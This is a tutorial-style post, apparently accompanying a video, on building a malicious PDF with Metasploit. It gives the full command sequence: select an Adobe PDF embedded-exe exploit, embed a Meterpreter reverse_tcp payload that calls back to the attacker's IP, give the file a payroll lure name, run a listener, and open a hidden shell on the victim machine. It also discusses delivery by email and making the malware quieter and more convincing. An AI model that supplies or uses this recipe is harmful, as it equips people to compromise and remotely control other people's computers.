How to make a malicious pdf (Making Malware)

If you’ve ever wondered what it takes to make basic malware, then this is for you.

Malware sounds like a dark art, but put simply malware is just a computer application that does something on your machine which enables a criminal to achieve their goal. You might have Word.exe on your computer for creating and writing documents, well malware might be something like passpad.exe which steals passwords from the machine. Simple, and malware is as easy to make as any computer application, it works within all the same parameters as a legit application, it just depends on how complicated it has to be to fulfill it’s purpose.

In this video tutorial we will show you how using free software you can create a simple malicious PDF. In this PDF we will hide our malware.

We first fire up metasploit to create our new pdf.

We perform a search of known vulnerabilities and exploits available for us to use, then once we have picked what we want to use we start creating the document that we’ll send to our victim hoping they run it. Once we have created our pdf we upload to a webserver where it will be downloaded by our victim. More often that not this will be sent as a link in an email, but we use this method here to keep the video short. (We will cover emailing malware in a future video)

You see the connection to the attackers machine instantly as soon as the document is opened. You’ll notice the extra pop up box before the document opens, but you’ll be surprised how many users just click through without reading them or being suspicious! Again this is simple malware, with more time we can eliminate the amount of user interaction required to make it almost silent. We can also add content to the pdf so it looks like a real document and not just blank. Again, we will work through creating more convincing malware in future tutorials.

Meterpreter commands used in this video are;

  1. search type:exploit platform:windows adobe pdf Simple search of the database for exploits for our chosen victim.
  2. use exploit/windows/fileformat/adobe_pdf_embedded_exe  This selects the chosen exploit.
  3. show options lists the options required to build the pdf
  4. set payload windows/meterpreter/reverse_tcp the malicious payload hidden in the pdf
  5. set FILENAME payroll2020.pdf name the pdf
  6. set LHOST 192.168.56.106 set the IP address of the attacking machine so the exploit knows where to call back to
  7. show info displays information about the exploit.
  8. run creates the pdf
  9. use exploit/multi/handler selects the listener which “listens” for the malware to call home to connect
  10. set payload windows/meterpreter/reverse_tcp this matches the payload hidden in the document and should connect to the same IP unless you are using VPNs or proxies.
  11. show options lists the options required for the listener and payload
  12. set LHOST 192.168.56.106 set the IP address of the attacking machine to listen on.
  13. run starts the listener
  14. sysinfo; this gives us the info of the infected system we are connected to.
  15. shell; this launches a hidden Windows command prompt which allows you to run native Windows commands. Which we use to launch “notepad.exe” and “calc.exe” as a demonstration that we are on the victim PC.

In future videos we’ll also show you how to spot this type of malware and stop it. Well I hope this has been useful, until next time.